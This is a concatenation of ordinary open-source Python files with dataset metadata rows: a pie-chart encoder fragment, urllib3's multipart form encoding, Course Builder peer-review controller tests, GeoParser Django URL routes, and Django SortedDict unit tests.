self.angle = None
def _GetFormatters(self):
"""Add a formatter for the chart angle."""
formatters = super(PieChartEncoder, self)._GetFormatters()
formatters.append(self._GetAngleParams)
return formatters
def _GetType(self, chart):
if len(chart.data) > 1:
if self.is3d:
warnings.warn(
'3d charts with more than one pie not supported; rendering in 2d',
RuntimeWarning, stacklevel=2)
chart_type = 'pc'
else:
if self.is3d:
chart_type = 'p3'
else:
chart_type = 'p'
return {'chart_type': chart_type}
def _GetDataSeriesParams(self, chart):
"""Collect params related to the data series."""
pie_points = []
labels = []
max_val = 1
for pie in chart.data:
points = []
for segment in pie:
if segment:
points.append(segment.size)
max_val = max(max_val, segment.size)
labels.append(segment.label or '')
if points:
pie_points.append(points)
encoder = self._GetDataEncoder(chart)
result = util.EncodeData(chart, pie_points, 0, max_val, encoder)
result.update(util.JoinLists(label=labels))
return result
def _GetColors(self, chart):
if chart._colors:
# Colors were overridden by the user
colors = chart._colors
else:
# Build the list of colors from individual segments
colors = []
for pie in chart.data:
for segment in pie:
if segment and segment.color:
colors.append(segment.color)
return util.JoinLists(color = colors)
def _GetAngleParams(self, chart):
"""If the user specified an angle, add it to the params."""
if self.angle:
return {'chp' : str(self.angle)}
return {}
| apache-2.0 | 1,440,252,435,834,017,500 | 33.418605 | 80 | 0.631081 | false |
vatsalgit/Deep-Learning- | assignment1/data/deep/lib/python3.4/site-packages/pip/_vendor/requests/packages/urllib3/filepost.py | 713 | 2320 | from __future__ import absolute_import
import codecs
from uuid import uuid4
from io import BytesIO
from .packages import six
from .packages.six import b
from .fields import RequestField
writer = codecs.lookup('utf-8')[3]
def choose_boundary():
"""
Our embarassingly-simple replacement for mimetools.choose_boundary.
"""
return uuid4().hex
def iter_field_objects(fields):
"""
Iterate over fields.
Supports list of (k, v) tuples and dicts, and lists of
:class:`~urllib3.fields.RequestField`.
"""
if isinstance(fields, dict):
i = six.iteritems(fields)
else:
i = iter(fields)
for field in i:
if isinstance(field, RequestField):
yield field
else:
yield RequestField.from_tuples(*field)
def iter_fields(fields):
"""
.. deprecated:: 1.6
Iterate over fields.
The addition of :class:`~urllib3.fields.RequestField` makes this function
obsolete. Instead, use :func:`iter_field_objects`, which returns
:class:`~urllib3.fields.RequestField` objects.
Supports list of (k, v) tuples and dicts.
"""
if isinstance(fields, dict):
return ((k, v) for k, v in six.iteritems(fields))
return ((k, v) for k, v in fields)
def encode_multipart_formdata(fields, boundary=None):
"""
Encode a dictionary of ``fields`` using the multipart/form-data MIME format.
:param fields:
Dictionary of fields or list of (key, :class:`~urllib3.fields.RequestField`).
:param boundary:
If not specified, then a random boundary will be generated using
:func:`mimetools.choose_boundary`.
"""
body = BytesIO()
if boundary is None:
boundary = choose_boundary()
for field in iter_field_objects(fields):
body.write(b('--%s\r\n' % (boundary)))
writer(body).write(field.render_headers())
data = field.data
if isinstance(data, int):
data = str(data) # Backwards compatibility
if isinstance(data, six.text_type):
writer(body).write(data)
else:
body.write(data)
body.write(b'\r\n')
body.write(b('--%s--\r\n' % (boundary)))
content_type = str('multipart/form-data; boundary=%s' % boundary)
return body.getvalue(), content_type
| gpl-3.0 | -6,402,843,337,765,813,000 | 23.680851 | 85 | 0.628879 | false |
Dreizan/csci1200OnlineCourse | tests/functional/controllers_review.py | 5 | 29623 | # coding: utf-8
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for controllers pertaining to peer review assessments."""
__author__ = 'Sean Lip'
import actions
from actions import assert_contains
from actions import assert_does_not_contain
from actions import assert_equals
from controllers import sites
from controllers import utils
from models import config
from models import courses
from models import transforms
# The unit id for the peer review assignment in the default course.
LEGACY_REVIEW_UNIT_ID = 'ReviewAssessmentExample'
def get_review_step_key(response):
"""Returns the review step key in a request query parameter."""
request_query_string = response.request.environ['QUERY_STRING']
return request_query_string[request_query_string.find('key=') + 4:]
def get_review_payload(identifier, is_draft=False):
"""Returns a sample review payload."""
review = transforms.dumps([
{'index': 0, 'type': 'choices', 'value': '0', 'correct': False},
{'index': 1, 'type': 'regex', 'value': identifier, 'correct': True}
])
return {
'answers': review,
'is_draft': 'true' if is_draft else 'false',
}
class PeerReviewControllerTest(actions.TestBase):
"""Test peer review from the Student perspective."""
def test_submit_assignment(self):
"""Test submission of peer-reviewed assignments."""
# Override course.yaml settings by patching app_context.
get_environ_old = sites.ApplicationContext.get_environ
def get_environ_new(self):
environ = get_environ_old(self)
environ['course']['browsable'] = False
return environ
sites.ApplicationContext.get_environ = get_environ_new
email = '[email protected]'
name = 'Test Peer Reviewed Assignment Submission'
submission = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'First answer to Q1',
'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'First answer to Q3',
'correct': True},
])
second_submission = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'Second answer to Q1',
'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'Second answer to Q3',
'correct': True},
])
# Check that the sample peer-review assignment shows up in the preview
# page.
response = actions.view_preview(self)
assert_contains('Sample peer review assignment', response.body)
assert_does_not_contain('Review peer assignments', response.body)
actions.login(email)
actions.register(self, name)
# Check that the sample peer-review assignment shows up in the course
# page and that it can be visited.
response = actions.view_course(self)
assert_contains('Sample peer review assignment', response.body)
assert_contains('Review peer assignments', response.body)
assert_contains(
'<a href="assessment?name=%s">' % LEGACY_REVIEW_UNIT_ID,
response.body)
assert_contains('<span> Review peer assignments </span>', response.body,
collapse_whitespace=True)
assert_does_not_contain('<a href="reviewdashboard', response.body,
collapse_whitespace=True)
# Check that the progress circle for this assignment is unfilled.
assert_contains(
'progress-notstarted-%s' % LEGACY_REVIEW_UNIT_ID, response.body)
assert_does_not_contain(
'progress-completed-%s' % LEGACY_REVIEW_UNIT_ID, response.body)
# Try to access an invalid assignment.
response = self.get(
'assessment?name=FakeAssessment', expect_errors=True)
assert_equals(response.status_int, 404)
# The student should not be able to see others' reviews because he/she
# has not submitted an assignment yet.
response = self.get('assessment?name=%s' % LEGACY_REVIEW_UNIT_ID)
assert_does_not_contain('Submitted assignment', response.body)
assert_contains('Due date for this assignment', response.body)
assert_does_not_contain('Reviews received', response.body)
# The student should not be able to access the review dashboard because
# he/she has not submitted the assignment yet.
response = self.get(
'reviewdashboard?unit=%s' % LEGACY_REVIEW_UNIT_ID,
expect_errors=True)
assert_contains('You must submit the assignment for', response.body)
# The student submits the assignment.
response = actions.submit_assessment(
self,
LEGACY_REVIEW_UNIT_ID,
{'answers': submission, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
)
assert_contains(
'Thank you for completing this assignment', response.body)
assert_contains('Review peer assignments', response.body)
# The student views the submitted assignment, which has become readonly.
response = self.get('assessment?name=%s' % LEGACY_REVIEW_UNIT_ID)
assert_contains('First answer to Q1', response.body)
assert_contains('Submitted assignment', response.body)
# The student tries to re-submit the same assignment. This should fail.
response = actions.submit_assessment(
self,
LEGACY_REVIEW_UNIT_ID,
{'answers': second_submission,
'assessment_type': LEGACY_REVIEW_UNIT_ID},
presubmit_checks=False
)
assert_contains(
'You have already submitted this assignment.', response.body)
assert_contains('Review peer assignments', response.body)
# The student views the submitted assignment. The new answers have not
# been saved.
response = self.get('assessment?name=%s' % LEGACY_REVIEW_UNIT_ID)
assert_contains('First answer to Q1', response.body)
assert_does_not_contain('Second answer to Q1', response.body)
# The student checks the course page and sees that the progress
# circle for this assignment has been filled, and that the 'Review
# peer assignments' link is now available.
response = actions.view_course(self)
assert_contains(
'progress-completed-%s' % LEGACY_REVIEW_UNIT_ID, response.body)
assert_does_not_contain(
'<span> Review peer assignments </span>', response.body,
collapse_whitespace=True)
assert_contains(
'<a href="reviewdashboard?unit=%s">' % LEGACY_REVIEW_UNIT_ID,
response.body, collapse_whitespace=True)
# The student should also be able to now view the review dashboard.
response = self.get('reviewdashboard?unit=%s' % LEGACY_REVIEW_UNIT_ID)
assert_contains('Assignments for your review', response.body)
assert_contains('Review a new assignment', response.body)
actions.logout()
# Clean up app_context.
sites.ApplicationContext.get_environ = get_environ_old
def test_handling_of_fake_review_step_key(self):
"""Test that bad keys result in the appropriate responses."""
email = '[email protected]'
name = 'Student 1'
submission = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S1-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'is-S1', 'correct': True},
])
payload = {
'answers': submission, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
actions.login(email)
actions.register(self, name)
actions.submit_assessment(self, LEGACY_REVIEW_UNIT_ID, payload)
actions.view_review(
self, LEGACY_REVIEW_UNIT_ID, 'Fake key',
expected_status_code=404)
actions.logout()
def test_not_enough_assignments_to_allocate(self):
"""Test for the case when there are too few assignments in the pool."""
email = '[email protected]'
name = 'Student 1'
submission = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S1-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'is-S1', 'correct': True},
])
payload = {
'answers': submission, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
actions.login(email)
actions.register(self, name)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload)
# The student goes to the review dashboard and requests an assignment
# to review -- but there is nothing to review.
response = actions.request_new_review(
self, LEGACY_REVIEW_UNIT_ID, expected_status_code=200)
assert_does_not_contain('Assignment to review', response.body)
assert_contains('Sorry, there are no new submissions ', response.body)
assert_contains('disabled="true"', response.body)
actions.logout()
def test_reviewer_cannot_impersonate_another_reviewer(self):
"""Test that one reviewer cannot use another's review step key."""
email1 = '[email protected]'
name1 = 'Student 1'
submission1 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S1-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'is-S1', 'correct': True},
])
payload1 = {
'answers': submission1, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
email2 = '[email protected]'
name2 = 'Student 2'
submission2 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S2-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'not-S1', 'correct': True},
])
payload2 = {
'answers': submission2, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
email3 = '[email protected]'
name3 = 'Student 3'
submission3 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S3-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'not-S1', 'correct': True},
])
payload3 = {
'answers': submission3, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
# Student 1 submits the assignment.
actions.login(email1)
actions.register(self, name1)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload1)
actions.logout()
# Student 2 logs in and submits the assignment.
actions.login(email2)
actions.register(self, name2)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload2)
# Student 2 requests a review, and is given Student 1's assignment.
response = actions.request_new_review(self, LEGACY_REVIEW_UNIT_ID)
review_step_key_2_for_1 = get_review_step_key(response)
assert_contains('S1-1', response.body)
actions.logout()
# Student 3 logs in, and submits the assignment.
actions.login(email3)
actions.register(self, name3)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload3)
# Student 3 tries to view Student 1's assignment using Student 2's
# review step key, but is not allowed to.
response = actions.view_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_2_for_1,
expected_status_code=404)
# Student 3 logs out.
actions.logout()
def test_student_cannot_see_reviews_prematurely(self):
"""Test that students cannot see others' reviews prematurely."""
email = '[email protected]'
name = 'Student 1'
submission = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S1-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'is-S1', 'correct': True},
])
payload = {
'answers': submission, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
actions.login(email)
actions.register(self, name)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload)
# Student 1 cannot see the reviews for his assignment yet, because he
# has not submitted the two required reviews.
response = self.get('assessment?name=%s' % LEGACY_REVIEW_UNIT_ID)
assert_equals(response.status_int, 200)
assert_contains('Due date for this assignment', response.body)
assert_contains(
'After you have completed the required number of peer reviews',
response.body)
actions.logout()
# pylint: disable-msg=too-many-statements
def test_draft_review_behaviour(self):
"""Test correctness of draft review visibility."""
email1 = '[email protected]'
name1 = 'Student 1'
submission1 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S1-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'is-S1', 'correct': True},
])
payload1 = {
'answers': submission1, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
email2 = '[email protected]'
name2 = 'Student 2'
submission2 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S2-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'not-S1', 'correct': True},
])
payload2 = {
'answers': submission2, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
email3 = '[email protected]'
name3 = 'Student 3'
submission3 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S3-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'not-S1', 'correct': True},
])
payload3 = {
'answers': submission3, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
# Student 1 submits the assignment.
actions.login(email1)
actions.register(self, name1)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload1)
actions.logout()
# Student 2 logs in and submits the assignment.
actions.login(email2)
actions.register(self, name2)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload2)
# Student 2 requests a review, and is given Student 1's assignment.
response = actions.request_new_review(self, LEGACY_REVIEW_UNIT_ID)
review_step_key_2_for_1 = get_review_step_key(response)
assert_contains('S1-1', response.body)
# Student 2 saves her review as a draft.
review_2_for_1_payload = get_review_payload(
'R2for1', is_draft=True)
response = actions.submit_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_2_for_1,
review_2_for_1_payload)
assert_contains('Your review has been saved.', response.body)
response = self.get('reviewdashboard?unit=%s' % LEGACY_REVIEW_UNIT_ID)
assert_equals(response.status_int, 200)
assert_contains('(Draft)', response.body)
# Student 2's draft is still changeable.
response = actions.view_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_2_for_1)
assert_contains('Submit Review', response.body)
response = actions.submit_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_2_for_1,
review_2_for_1_payload)
assert_contains('Your review has been saved.', response.body)
# Student 2 logs out.
actions.logout()
# Student 3 submits the assignment.
actions.login(email3)
actions.register(self, name3)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload3)
actions.logout()
# Student 1 logs in and requests two assignments to review.
actions.login(email1)
response = self.get('/reviewdashboard?unit=%s' % LEGACY_REVIEW_UNIT_ID)
response = actions.request_new_review(self, LEGACY_REVIEW_UNIT_ID)
assert_contains('Assignment to review', response.body)
assert_contains('not-S1', response.body)
review_step_key_1_for_someone = get_review_step_key(response)
response = actions.request_new_review(self, LEGACY_REVIEW_UNIT_ID)
assert_contains('Assignment to review', response.body)
assert_contains('not-S1', response.body)
review_step_key_1_for_someone_else = get_review_step_key(response)
response = self.get('reviewdashboard?unit=%s' % LEGACY_REVIEW_UNIT_ID)
assert_equals(response.status_int, 200)
assert_contains('disabled="true"', response.body)
# Student 1 submits both reviews, fulfilling his quota.
review_1_for_other_payload = get_review_payload('R1for')
response = actions.submit_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_1_for_someone,
review_1_for_other_payload)
assert_contains(
'Your review has been submitted successfully', response.body)
response = actions.submit_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_1_for_someone_else,
review_1_for_other_payload)
assert_contains(
'Your review has been submitted successfully', response.body)
response = self.get('/reviewdashboard?unit=%s' % LEGACY_REVIEW_UNIT_ID)
assert_contains('(Completed)', response.body)
assert_does_not_contain('(Draft)', response.body)
# Although Student 1 has submitted 2 reviews, he cannot view Student
# 2's review because it is still in Draft status.
response = self.get('assessment?name=%s' % LEGACY_REVIEW_UNIT_ID)
assert_equals(response.status_int, 200)
assert_contains(
'You have not received any peer reviews yet.', response.body)
assert_does_not_contain('R2for1', response.body)
# Student 1 logs out.
actions.logout()
# Student 2 submits her review for Student 1's assignment.
actions.login(email2)
response = self.get('review?unit=%s&key=%s' % (
LEGACY_REVIEW_UNIT_ID, review_step_key_2_for_1))
assert_does_not_contain('Submitted review', response.body)
response = actions.submit_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_2_for_1,
get_review_payload('R2for1'))
assert_contains(
'Your review has been submitted successfully', response.body)
# Her review is now read-only.
response = self.get('review?unit=%s&key=%s' % (
LEGACY_REVIEW_UNIT_ID, review_step_key_2_for_1))
assert_contains('Submitted review', response.body)
assert_contains('R2for1', response.body)
# Student 2 logs out.
actions.logout()
# Now Student 1 can see the review he has received from Student 2.
actions.login(email1)
response = self.get('assessment?name=%s' % LEGACY_REVIEW_UNIT_ID)
assert_equals(response.status_int, 200)
assert_contains('R2for1', response.body)
def test_independence_of_draft_reviews(self):
"""Test that draft reviews do not interfere with each other."""
email1 = '[email protected]'
name1 = 'Student 1'
submission1 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S1-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'is-S1', 'correct': True},
])
payload1 = {
'answers': submission1, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
email2 = '[email protected]'
name2 = 'Student 2'
submission2 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S2-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'not-S1', 'correct': True},
])
payload2 = {
'answers': submission2, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
email3 = '[email protected]'
name3 = 'Student 3'
submission3 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S3-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'not-S1', 'correct': True},
])
payload3 = {
'answers': submission3, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
# Student 1 submits the assignment.
actions.login(email1)
actions.register(self, name1)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload1)
actions.logout()
# Student 2 logs in and submits the assignment.
actions.login(email2)
actions.register(self, name2)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload2)
actions.logout()
# Student 3 logs in and submits the assignment.
actions.login(email3)
actions.register(self, name3)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload3)
actions.logout()
# Student 1 logs in and requests two assignments to review.
actions.login(email1)
response = self.get('/reviewdashboard?unit=%s' % LEGACY_REVIEW_UNIT_ID)
response = actions.request_new_review(self, LEGACY_REVIEW_UNIT_ID)
assert_equals(response.status_int, 200)
assert_contains('Assignment to review', response.body)
assert_contains('not-S1', response.body)
review_step_key_1_for_someone = get_review_step_key(response)
response = actions.request_new_review(self, LEGACY_REVIEW_UNIT_ID)
assert_equals(response.status_int, 200)
assert_contains('Assignment to review', response.body)
assert_contains('not-S1', response.body)
review_step_key_1_for_someone_else = get_review_step_key(response)
self.assertNotEqual(
review_step_key_1_for_someone, review_step_key_1_for_someone_else)
# Student 1 submits two draft reviews.
response = actions.submit_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_1_for_someone,
get_review_payload('R1forFirst', is_draft=True))
assert_contains('Your review has been saved.', response.body)
response = actions.submit_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_1_for_someone_else,
get_review_payload('R1forSecond', is_draft=True))
assert_contains('Your review has been saved.', response.body)
# The two draft reviews should still be different when subsequently
# accessed.
response = self.get('review?unit=%s&key=%s' % (
LEGACY_REVIEW_UNIT_ID, review_step_key_1_for_someone))
assert_contains('R1forFirst', response.body)
response = self.get('review?unit=%s&key=%s' % (
LEGACY_REVIEW_UNIT_ID, review_step_key_1_for_someone_else))
assert_contains('R1forSecond', response.body)
# Student 1 logs out.
actions.logout()
class PeerReviewDashboardAdminTest(actions.TestBase):
"""Test peer review dashboard from the Admin perspective."""
def test_add_reviewer(self):
"""Test that admin can add a reviewer, and cannot re-add reviewers."""
email = '[email protected]'
name = 'Test Add Reviewer'
submission = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'First answer to Q1',
'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'First answer to Q3',
'correct': True},
])
payload = {
'answers': submission, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
actions.login(email)
actions.register(self, name)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload)
# There is nothing to review on the review dashboard.
response = actions.request_new_review(
self, LEGACY_REVIEW_UNIT_ID, expected_status_code=200)
assert_does_not_contain('Assignment to review', response.body)
assert_contains('Sorry, there are no new submissions ', response.body)
actions.logout()
# The admin assigns the student to review his own work.
actions.login(email, is_admin=True)
response = actions.add_reviewer(
self, LEGACY_REVIEW_UNIT_ID, email, email)
assert_equals(response.status_int, 302)
response = self.get(response.location)
assert_does_not_contain(
'Error 412: The reviewer is already assigned', response.body)
assert_contains('First answer to Q1', response.body)
assert_contains(
'Review 1 from [email protected]', response.body)
# The admin repeats the 'add reviewer' action. This should fail.
response = actions.add_reviewer(
self, LEGACY_REVIEW_UNIT_ID, email, email)
assert_equals(response.status_int, 302)
response = self.get(response.location)
assert_contains(
'Error 412: The reviewer is already assigned', response.body)
class PeerReviewDashboardStudentTest(actions.TestBase):
"""Test peer review dashboard from the Student perspective."""
COURSE_NAME = 'back_button_top_level'
STUDENT_EMAIL = '[email protected]'
def setUp(self):
super(PeerReviewDashboardStudentTest, self).setUp()
self.base = '/' + self.COURSE_NAME
context = actions.simple_add_course(
self.COURSE_NAME, '[email protected]', 'Peer Back Button Child')
self.course = courses.Course(None, context)
self.assessment = self.course.add_assessment()
self.assessment.title = 'Assessment'
self.assessment.html_content = 'assessment content'
self.assessment.workflow_yaml = (
'{grader: human,'
'matcher: peer,'
'review_due_date: \'2034-07-01 12:00\','
'review_min_count: 1,'
'review_window_mins: 20,'
'submission_due_date: \'2034-07-01 12:00\'}')
self.assessment.now_available = True
self.course.save()
actions.login(self.STUDENT_EMAIL)
actions.register(self, self.STUDENT_EMAIL)
config.Registry.test_overrides[
utils.CAN_PERSIST_ACTIVITY_EVENTS.name] = True
actions.submit_assessment(
self,
self.assessment.unit_id,
{'answers': '', 'score': 0,
'assessment_type': self.assessment.unit_id},
presubmit_checks=False
)
def test_back_button_top_level_assessment(self):
response = self.get('reviewdashboard?unit=%s' % str(
self.assessment.unit_id))
back_button = self.parse_html_string(response.body).find(
'.//*[@href="assessment?name=%s"]' % self.assessment.unit_id)
self.assertIsNotNone(back_button)
self.assertEquals(back_button.text, 'Back to assignment')
def test_back_button_child_assessment(self):
parent_unit = self.course.add_unit()
parent_unit.title = 'No Lessons'
parent_unit.now_available = True
parent_unit.pre_assessment = self.assessment.unit_id
self.course.save()
response = self.get('reviewdashboard?unit=%s' % str(
self.assessment.unit_id))
back_button = self.parse_html_string(response.body).find(
'.//*[@href="unit?unit=%s&assessment=%s"]' % (
parent_unit.unit_id, self.assessment.unit_id))
self.assertIsNotNone(back_button)
self.assertEquals(back_button.text, 'Back to assignment')
| apache-2.0 | 4,509,567,241,261,761,000 | 40.546985 | 80 | 0.610843 | false |
MBoustani/GeoParser | geoparser_app/urls.py | 3 | 2166 | from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('geoparser_app.views',
url(r'^$', views.index, name='index'),
url(r'^extract_text/(?P<file_name>\S+)$', views.extract_text, name='extract_text'),
url(r'^find_location/(?P<file_name>\S+)', views.find_location, name='find_location'),
url(r'^find_latlon/(?P<file_name>\S+)', views.find_latlon, name='find_latlon'),
url(r'^return_points/(?P<file_name>\S+)/(?P<core_name>\S+)', views.return_points, name='return_points'),
url(r'^return_points_khooshe/(?P<indexed_path>\S+)/(?P<domain_name>\S+)', views.return_points_khooshe, name='return_points_khooshe'),
url(r'^refresh_khooshe_tiles/(?P<indexed_path>\S+)/(?P<domain_name>\S+)', views.refresh_khooshe_tiles, name='refresh_khooshe_tiles'),
url(r'^set_idx_fields_for_popup/(?P<indexed_path>\S+)/(?P<domain_name>\S+)/(?P<index_field_csv>\S+)', views.set_idx_fields_for_popup, name='set_idx_fields_for_popup'),
url(r'^get_idx_fields_for_popup/(?P<indexed_path>\S+)/(?P<domain_name>\S+)', views.get_idx_fields_for_popup, name='get_idx_fields_for_popup'),
url(r'list_of_uploaded_files$', views.list_of_uploaded_files, name='list_of_uploaded_files'),
url(r'index_file/(?P<file_name>\S+)$', views.index_file, name='index_file'),
url(r'query_crawled_index/(?P<indexed_path>\S+)/(?P<domain_name>\S+)$', views.query_crawled_index, name='query_crawled_index'),
url(r'add_crawled_index/(?P<indexed_path>\S+)/(?P<domain_name>\S+)/(?P<username>\S+)/(?P<passwd>\S+)$', views.add_crawled_index, name='add_crawled_index'),
url(r'list_of_domains/$', views.list_of_domains, name='list_of_domains'),
url(r'search_crawled_index/(?P<indexed_path>\S+)/(?P<domain_name>\S+)/(?P<keyword>\S+)$', views.search_crawled_index, name='search_crawled_index'),
url(r'list_of_searched_tiles/$', views.list_of_searched_tiles, name='list_of_searched_tiles'),
url(r'remove_khooshe_tile/(?P<tiles_path>\S+)/(?P<khooshe_folder>\S+)$', views.remove_khooshe_tile, name='remove_khooshe_tile'),
url(r'remove_uploaded_file/(?P<file_name>\S+)$', views.remove_uploaded_file, name='remove_uploaded_file'),
) | apache-2.0 | -6,716,810,178,570,947,000 | 85.68 | 171 | 0.668052 | false |
RaoUmer/django | tests/regressiontests/utils/datastructures.py | 7 | 10672 | """
Tests for stuff in django.utils.datastructures.
"""
import copy
import pickle
import warnings
from django.test import SimpleTestCase
from django.utils.datastructures import (DictWrapper, ImmutableList,
MultiValueDict, MultiValueDictKeyError, MergeDict, SortedDict)
from django.utils import six
class SortedDictTests(SimpleTestCase):
def setUp(self):
self.d1 = SortedDict()
self.d1[7] = 'seven'
self.d1[1] = 'one'
self.d1[9] = 'nine'
self.d2 = SortedDict()
self.d2[1] = 'one'
self.d2[9] = 'nine'
self.d2[0] = 'nil'
self.d2[7] = 'seven'
def test_basic_methods(self):
self.assertEqual(list(six.iterkeys(self.d1)), [7, 1, 9])
self.assertEqual(list(six.itervalues(self.d1)), ['seven', 'one', 'nine'])
self.assertEqual(list(six.iteritems(self.d1)), [(7, 'seven'), (1, 'one'), (9, 'nine')])
def test_overwrite_ordering(self):
""" Overwriting an item keeps its place. """
self.d1[1] = 'ONE'
self.assertEqual(list(six.itervalues(self.d1)), ['seven', 'ONE', 'nine'])
def test_append_items(self):
""" New items go to the end. """
self.d1[0] = 'nil'
self.assertEqual(list(six.iterkeys(self.d1)), [7, 1, 9, 0])
def test_delete_and_insert(self):
"""
Deleting an item, then inserting the same key again will place it
at the end.
"""
del self.d2[7]
self.assertEqual(list(six.iterkeys(self.d2)), [1, 9, 0])
self.d2[7] = 'lucky number 7'
self.assertEqual(list(six.iterkeys(self.d2)), [1, 9, 0, 7])
if not six.PY3:
def test_change_keys(self):
"""
Changing the keys won't do anything, it's only a copy of the
keys dict.
This test doesn't make sense under Python 3 because keys is
an iterator.
"""
k = self.d2.keys()
k.remove(9)
self.assertEqual(self.d2.keys(), [1, 9, 0, 7])
def test_init_keys(self):
"""
Initialising a SortedDict with two keys will just take the first one.
A real dict will actually take the second value so we will too, but
we'll keep the ordering from the first key found.
"""
tuples = ((2, 'two'), (1, 'one'), (2, 'second-two'))
d = SortedDict(tuples)
self.assertEqual(list(six.iterkeys(d)), [2, 1])
real_dict = dict(tuples)
self.assertEqual(sorted(six.itervalues(real_dict)), ['one', 'second-two'])
# Here the order of SortedDict values *is* what we are testing
self.assertEqual(list(six.itervalues(d)), ['second-two', 'one'])
def test_overwrite(self):
self.d1[1] = 'not one'
self.assertEqual(self.d1[1], 'not one')
self.assertEqual(list(six.iterkeys(self.d1)), list(six.iterkeys(self.d1.copy())))
def test_append(self):
self.d1[13] = 'thirteen'
self.assertEqual(
repr(self.d1),
"{7: 'seven', 1: 'one', 9: 'nine', 13: 'thirteen'}"
)
def test_pop(self):
self.assertEqual(self.d1.pop(1, 'missing'), 'one')
self.assertEqual(self.d1.pop(1, 'missing'), 'missing')
# We don't know which item will be popped in popitem(), so we'll
# just check that the number of keys has decreased.
l = len(self.d1)
self.d1.popitem()
self.assertEqual(l - len(self.d1), 1)
def test_dict_equality(self):
d = SortedDict((i, i) for i in range(3))
self.assertEqual(d, {0: 0, 1: 1, 2: 2})
def test_tuple_init(self):
d = SortedDict(((1, "one"), (0, "zero"), (2, "two")))
